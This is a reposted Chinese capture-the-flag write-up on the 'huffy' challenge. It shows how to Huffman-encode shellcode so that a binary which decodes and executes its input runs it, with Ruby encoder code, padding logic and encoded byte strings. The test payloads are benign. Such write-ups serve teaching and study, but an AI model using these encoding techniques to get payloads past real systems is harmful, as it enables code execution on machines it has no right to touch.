转载

Huffy：哈夫曼编码的shellcode

初次见到“shellcode”的时候，感觉非常高大上，其实接触久了之后你会发现它实际上只是一段代码（也可以是填充数据），是一种用来发送到服务器利用特定漏洞的针对性代码，一般可以利用它获取一定的权限。今天我们将共同学习一种新的shellcode编码方式——Huffy，即基于哈夫曼编码的shellcode，这种方式利用哈夫曼树压缩数据的特性来对shellcode进行数据压缩，以达到“短小精悍”的目的。

哈夫曼树

因为这种方法叫做Huffy，并且最近我刚刚解决了一个有关哈夫曼树的问题，所以首先我想到的就是哈夫曼树。

如果你还不知道什么是哈夫曼树，那我就在这里简单提一下。哈夫曼树是一种相当简单的数据结构，它可以用来进行数据压缩。哈夫曼树的建立是通过读取输入的内容，然后创建一棵树，出现频率最高的字符靠近树的顶部，而频率最低的字符靠近树的底部。

为了压缩数据，它会遍历整个树以生成编码位（左边的编码为0，右边的编码为1）。一个字符越靠近树的顶部，那么该字符编码之后所用的位数越少，这也被称为“前缀码”，这是一种非常简洁的属性，该属性意味着没有编码的位串会作为另一个位串的前缀（换句话说，当你阅读二进制位流的时候，你就能立刻知道解码该字符何时结束）。

例如下面的哈夫曼树：

Huffy：哈夫曼编码的shellcode

通过该哈夫曼树，我们就能知道它来自一个包含9个字符的文本，其中有5个字符是字母“o”，3个字符是字母“d”，1个字符是字母“g”。

所以，当你用该树压缩数据时，你可以将单词“dog”作如下处理：

d=00（左左） o=1（右） g=01（左右）

所以，“dog”将会编码成位流“00101”。

如果你看到以位流“01100”表示的字符串，你就可以按照上面哈夫曼树来解码：左右（g）、右（o）、左左（d），所以解码得到该字符串内容为“god”。

如果在一个字符串中所有字符的数目都相同，并且不同字符的种类数是2的整数幂（例如：“aabbccdd”中，不同字符的种类数为4，即2的平方），你就需要通过一个平衡的哈夫曼树来表示。例如，字符串“aaabbbcccddd”的表示将会是如下形式的哈夫曼树：

Huffy：哈夫曼编码的shellcode

通过查找上图中的哈夫曼树可知，字符串“abcd”将会编码成“00011011”。哈夫曼树的这种特性非常重要。

程序分析

当你运行程序时，它将提示你输入，在你输入相应内容之后，它将输出一堆毫无意义的东西（尽管输出使我们理解变得简单多了）。可以看下这个例子：

$ echo 'this is a test string' | ./huffy CWD: /home/ron/gits2015/huffy Nibble  Frequency ------  --------- 0       0.113636 1       0.022727 2       0.113636 3       0.090909 4       0.090909 5       0.022727 6       0.181818 7       0.227273 8       0.022727 9       0.068182 a       0.022727 b       0.000000 c       0.000000 d       0.000000 e       0.022727 f       0.000000 Read 22 bytes Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.000000 Two lowest frequencies: 0.000000 and 0.022727 Two lowest frequencies: 0.022727 and 0.022727 Two lowest frequencies: 0.022727 and 0.022727 Two lowest frequencies: 0.022727 and 0.045455 Two lowest frequencies: 0.045455 and 0.068182 Two lowest frequencies: 0.068182 and 0.090909 Two lowest frequencies: 0.090909 and 0.113636 Two lowest frequencies: 0.113636 and 0.113636 Two lowest frequencies: 0.159091 and 0.181818 Two lowest frequencies: 0.204545 and 0.227273 Two lowest frequencies: 0.227273 and 0.227273 Two lowest frequencies: 0.340909 and 0.431818 Two lowest frequencies: 0.454545 and 0.454545 Two lowest frequencies: 0.772727 and 0.909091 Breaking! 0 --0--> 0x9863348 --1--> 0x9863390 --1--> 0x98633c0 --1--> 0x98633d8 1 --0--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 2 --1--> 0x9863348 --1--> 0x9863390 --1--> 0x98633c0 --1--> 0x98633d8 3 --1--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 4 --0--> 0x9863330 --0--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8 5 --0--> 0x98632d0 --0--> 0x9863300 --1--> 0x9863330 --0--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8 6 --1--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 7 --1--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8 8 --0--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 9 --1--> 0x9863300 --1--> 0x9863330 --0--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8 a --1--> 0x98632d0 --0--> 0x9863300 --1--> 0x9863330 --0--> 0x9863378 --1--> 0x98633a8 --0--> 0x98633d8 b --0--> 0x9863258 --0--> 0x9863270 --0--> 0x9863288 --0--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 c --1--> 0x9863288 --0--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 d --1--> 0x9863270 --0--> 0x9863288 --0--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 e --1--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 f --1--> 0x9863258 --0--> 0x9863270 --0--> 0x9863288 --0--> 0x98632a0 --1--> 0x98632b8 --1--> 0x98632e8 --0--> 0x9863318 --0--> 0x9863360 --0--> 0x98633a8 --0--> 0x98633d8 Encoding input... ASCII Encoded: 011010000100000001010110110001111111100010101101100011111111000100001011111110011010000101010001100010110100111111100110001011010001111110010101100100001110010111110010101 Binary Encoded: h@V????Q?O?-???? Executing encoded input... Segmentation fault

可能理解起来需要花一点时间，但是一旦你明白了，你会发现输出的内容很直截了当。

第一部分分析了每个半字节（半字节代表一个十六进制字符或字节的一半）出现的频率。这部分结果告诉我们程序通过半字节的形式对数据进行了压缩，然后给出了输入内容中字符出现频率的分析，最后显示了16个可能半字节的编码结果。

编码之后，会将这些位转换成一个很长的二进制码流，然后运行它们。

流程总结：首先输入一些数据，然后以半字节为单位用哈夫曼编码进行压缩，最后将其转换成可执行的代码，此时我们就得到了利用哈夫曼算法压缩过的shellcode。

为了简单起见，我还是用一些shell代码来清理输出的内容，以方便我更好地分析到底发生了什么：

$ echo 'this is a test string' | ./huffy | sed -re 's/ --/ /' -e 's/--> .{9} --//g' -e 's/--> .*//'

得到如下结果：

[...] 0 0111 1 010000 2 1111 3 1000 4 0010 5 001010 6 100 7 110 8 00000 9 11010 a 101010 b 0000110000 c 10110000 d 100110000 e 1110000 f 1000110000 Encoding input... ASCII Encoded: 011010000100000001010110110001111111100010101101100011111111000100001011111110011010000101010001100010110100111111100110001011010001111110010101100100001110010111110010101

如果你尝试输入“AAAA”，你将得到如下结果：

$ echo 'AAAA' | ./huffy | sed -re 's/ --/ /' -e 's/--> .{9} --//g' -e 's/--> .*//'[...] 0 0101 1 0 2 0000000000001101 3 101101 4 11 5 1001101 6 10001101 7 100001101 8 1000001101 9 10000001101 a 11101 b 100000001101 c 1000000001101 d 10000000001101 e 100000000001101 f 1000000000001101 Encoding input... ASCII Encoded: 110110110110101010111 Binary Encoded:

你可能知道“AAAA”=“41414141”（ASCII码表示），所以'4'和'1'就成了最常用的半字节，而由上面图中也能证实，即'4'被编码成'11'，'1'被编码成'0'。我们希望以一个换行符'/x0a'结束，所以'0'和'a'也应该进行编码。

如果我们将这些字符分开，可以得到如下内容：

ASCII Encoded: 11 0 11 0 11 0 11 0 1010 10111

需要注意的是，图中编码后的结果都被逆序了，虽然'11'和'0'其实并不受逆序的影响，但是'1010'='0101'='0'，'10111'='11101'='a'。说实话，刚开始我并没有注意到逆序问题的存在，但我以一个新的方式解决了这个问题。

还记得前面说的吗？如果有一个含有2的幂次方个节点的平衡树，所有的字符都将被编码成相同的位数。事实证明，结果有16个不同的半字节，所以如果你输入的字符串中有偶数个半字节，那么它们都将被编码成4位：

$ echo -ne '/x01/x23/x45/x67/x89/xab/xcd/xef' | ./huffy | sed -re 's/ --/ /' -e 's/--> .{9} --//g' -e 's/--> .*//'0 0000 1 0001 2 0011 3 0010 4 0110 5 0111 6 0101 7 0100 8 1100 9 1101 a 1111 b 1110 c 1010 d 1011 e 1001 f 1000

它们不仅会被编码成4位，而且每一种可能的4位值都被列出来了。

方法使用

其实，这种方法使用起来非常简单，需要做的仅仅是简单的查表：

1、首先算出半字节对应的编码后的二进制位；

2、将这些半字节作为shellcode写出来；

3、填充shellcode，直到每个半字节都有相同的数量。

这已经相当的直观了，你可以参考我的全部利用代码，或者利用下面的片段根据实际情况进行拼接。

首先，创建一个表（下面是我手工创建的）：

@@table = {  "0000" => 0x0, "0001" => 0x1, "0011" => 0x2, "0010" => 0x3,  "0110" => 0x4, "0111" => 0x5, "0101" => 0x6, "0100" => 0x7,  "1100" => 0x8, "1101" => 0x9, "1111" => 0xa, "1110" => 0xb,  "1010" => 0xc, "1011" => 0xd, "1001" => 0xe, "1000" => 0xf, }

然后，将shellcode进行编码：

def encode_nibble(b)   binary = b.to_s(2).rjust(4, '0')   puts("Looking up %s... => %x" % [binary, @@table[binary]])  return @@table[binary]end@@hist = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ]#shellcode = "/xeb/xfe"#shellcode = "/xcd/x03"shellcode = "hello world, this is my shellcode!"shellcode.each_byte do |b|   n1 = b >> 4   n2 = b & 0x0f   puts("n1 = %x" % n1)   puts("n2 = %x" % n2)  @@hist[n1] += 1   @@hist[n2] += 1   out += ((encode_nibble(n1) << 4) | (encode_nibble(n2) & 0x0F)).chrend

需要注意一下，我保存了一个直方图，利用它可以使最后一步的实现更加简单，然后根据需要填充字符串：

def get_padding() result = "" max = @@hist.max needed_nibbles = []  0.upto(@@hist.length - 1) do |i|   needed_nibbles << [i] * (max - @@hist[i])   needed_nibbles.flatten!  end if((needed_nibbles.length % 2) != 0)   puts("We need an odd number of nibbles! Add some NOPs or something :(")    exit end 0.step(needed_nibbles.length - 1, 2) do |i|   n1 = needed_nibbles[i]   n2 = needed_nibbles[i+1]   result += ((encode_nibble(n1) << 4) | (encode_nibble(n2) & 0x0f)).chr  end return resultend

现在输出中应该包含一串对应shellcode的半字节，应该是这样的。

最后，我们将其输出：

def output(str)   print "echo -ne '"   str.bytes.each do |b|     print("//x%02x" % b)  end   puts("' > in; ./huffy < in")end

修复bug

你注意到刚刚我哪里做错了吗？其实，刚刚我犯了个大错误，当我试图编码“hello world, this is my shellcode!”时，我得到如下结果：

echo -ne '/x4f/x46/x48/x48/x4a/x30/x55/x4a/x53/x48/x47/x38/x30/x57/x4f/x4e/x52/x30/x4e/x52/x30/x49/x5e/x30/x52/x4f/x46/x48/x48/x42/x4a/x47/x46/x31/x00/x00/x00/x00/x00/x00/x00/x01/x11/x11/x11/x11/x11/x11/x11/x11/x11/x33/x33/x33/x33/x33/x33/x22/x22/x22/x22/x22/x22/x22/x22/x77/x77/x77/x77/x77/x77/x77/x77/x76/x66/x66/x66/x66/x66/x66/x66/x66/x55/x55/x55/x55/x55/x55/xff/xff/xff/xff/xff/xff/xff/xff/xfe/xee/xee/xee/xee/xee/xee/xee/xee/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xdd/xdd/xdd/xdd/xdd/xdd/xdd/xdd/xdd/xdd/x88/x88/x88/x88/x88/x88/x88/x99/x99/x99/x99/x99/x99/x99/x99/x99/x9b/xbb/xbb/xbb/xbb/xbb/xbb/xbb/xbb/xbb/xba/xaa/xaa/xaa/xaa/xaa/xaa/xaa/xaa' > in; ./huffy < in

上面结果转换为可视字符后为：

ajcco@?o?cbC@?ai?@i?@k?@?ajcclobj?????????DDDDDD????????""""""""*??????????????????????UUUUUUUUUU??????????3333333??????????wwwwwwwww????????

发生了什么事？这不是我之前输入的字符串啊。

但是，观察到字符串以“ajcco”开头，而我之前输入的字符串是以“hello”开头。然后，半字节和字符的对应表就得到啦，如下所示：

0 0000 1 0001 2 0011 3 0010 4 0110 5 0111 6 0101 7 0100 8 1100 9 1101 a 1111 b 1110 c 1010 d 1011 e 1001 f 1000

为了解决这个问题，我试了下面的shellcode：

"/x01/x23/x45/x67/x89/xab/xcd/xef"

然后将其编码，得到如下结果：

以十六进制表示为：

"/x08/x4c/x3a/x6e/x19/x5d/x3b/x7f"

或者，以半字节形式表示为：

0000 1000 0100 1100 0010 1010 0110 1110 0001 1001 0101 1101 0011 1011 0111 1111

如果多花点精力观察的话，我应该早就发现这个很明显的问题啦：逆序问题。

因为之前我急于完成它，我没有注意到每个半字节的各个位都被逆序了（1000而不是0001，0100而不是0010等等）。

虽然之前我没有注意这个问题，但是我发现所有的结果都是完全错误的，所以我做了以下内容：

hack_table = {   0x02 => 0x08, 0x0d => 0x09, 0x00 => 0x00, 0x08 => 0x02,   0x0f => 0x01, 0x07 => 0x03, 0x03 => 0x07, 0x0c => 0x06,   0x04 => 0x04, 0x0b => 0x05, 0x01 => 0x0f, 0x0e => 0x0e,   0x06 => 0x0c, 0x09 => 0x0d, 0x05 => 0x0b, 0x0a => 0x0a } hack_out = "" out.bytes.each do |b|   n1 = hack_table[b >> 4]   n2 = hack_table[b & 0x0f]   hack_out += ((n1 << 4) | (n2 & 0x000f)).chrendoutput(hack_out)

然后用原来的测试shellcode重新运行了该程序：

$ ruby ./sploit.rb echo -ne '/x41/x4c/x42/x42/x4a/x70/xbb/x4a/xb7/x42/x43/x72/x70/xb3/x41/x4e/xb8/x70/x4e/xb8/x70/x4d/xbe/x70/xb8/x41/x4c/x42/x42/x48/x4a/x43/x4c/x7f/x00/x00/x00/x00/x00/x00/x00/x0f/xff/xff/xff/xff/xff/xff/xff/xff/xff/x77/x77/x77/x77/x77/x77/x88/x88/x88/x88/x88/x88/x88/x88/x33/x33/x33/x33/x33/x33/x33/x33/x3c/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xbb/xbb/xbb/xbb/xbb/xbb/x11/x11/x11/x11/x11/x11/x11/x11/x1e/xee/xee/xee/xee/xee/xee/xee/xee/x66/x66/x66/x66/x66/x66/x66/x66/x66/x66/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x22/x22/x22/x22/x22/x22/x22/xdd/xdd/xdd/xdd/xdd/xdd/xdd/xdd/xdd/xd5/x55/x55/x55/x55/x55/x55/x55/x55/x55/x5a/xaa/xaa/xaa/xaa/xaa/xaa/xaa/xaa' > in; ./huffy < in

运行上面我所得到的编码之后的代码，结果为：

$ echo -ne '/x41/x4c/x42/x42/x4a/x70/xbb/x4a/xb7/x42/x43/x72/x70/xb3/x41/x4e/xb8/x70/x4e/xb8/x70/x4d/xbe/x70/xb8/x41/x4c/x42/x42/x48/x4a/x43/x4c/x7f/x00/x00/x00/x00/x00/x00/x00/x0f/xff/xff/xff/xff/xff/xff/xff/xff/xff/x77/x77/x77/x77/x77/x77/x88/x88/x88/x88/x88/x88/x88/x88/x33/x33/x33/x33/x33/x33/x33/x33/x3c/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xcc/xbb/xbb/xbb/xbb/xbb/xbb/x11/x11/x11/x11/x11/x11/x11/x11/x1e/xee/xee/xee/xee/xee/xee/xee/xee/x66/x66/x66/x66/x66/x66/x66/x66/x66/x66/x99/x99/x99/x99/x99/x99/x99/x99/x99/x99/x22/x22/x22/x22/x22/x22/x22/xdd/xdd/xdd/xdd/xdd/xdd/xdd/xdd/xdd/xd5/x55/x55/x55/x55/x55/x55/x55/x55/x55/x5a/xaa/xaa/xaa/xaa/xaa/xaa/xaa/xaa' > in; ./huffy < in

二进制编码结果为：

hello world, this is my shellcode!""""""33333333DDDDDDDDEUUUUUUUUwwwwww???????????????????????????????????????????????????????????????????????? Executing encoded input... Segmentation fault

现在看起来正常了，通过修改那个错误已经可以正确地解码了。下面再试一下我比较喜欢的两个测试字符串“/xcd/x03”（调试断点，也可使用“/ xcc”）和“/ xeb / xfe”（无限循环）：

$ ruby ./sploit.rb echo -ne '/x2d/x08/xf7/x3c/x4b/x1e/x69/x5a' > in; ./huffy < in $ echo -ne '/x2d/x08/xf7/x3c/x4b/x1e/x69/x5a' > in; ./huffy < in Binary Encoded: ?Eg??? Executing encoded input... Trace/breakpoint trap $ ruby ./sploit.rb echo -ne '/x59/xa5/x00/xff/x77/x88/x33/xcc/x44/xbb/x11/xee/x66/x92/x2d/xda' > in; ./huffy < in $ echo -ne '/x59/xa5/x00/xff/x77/x88/x33/xcc/x44/xbb/x11/xee/x66/x92/x2d/xda' > in; ./huffy < in Binary Encoded: ??"3DUfw?????? Executing encoded input... [...infinite loop...]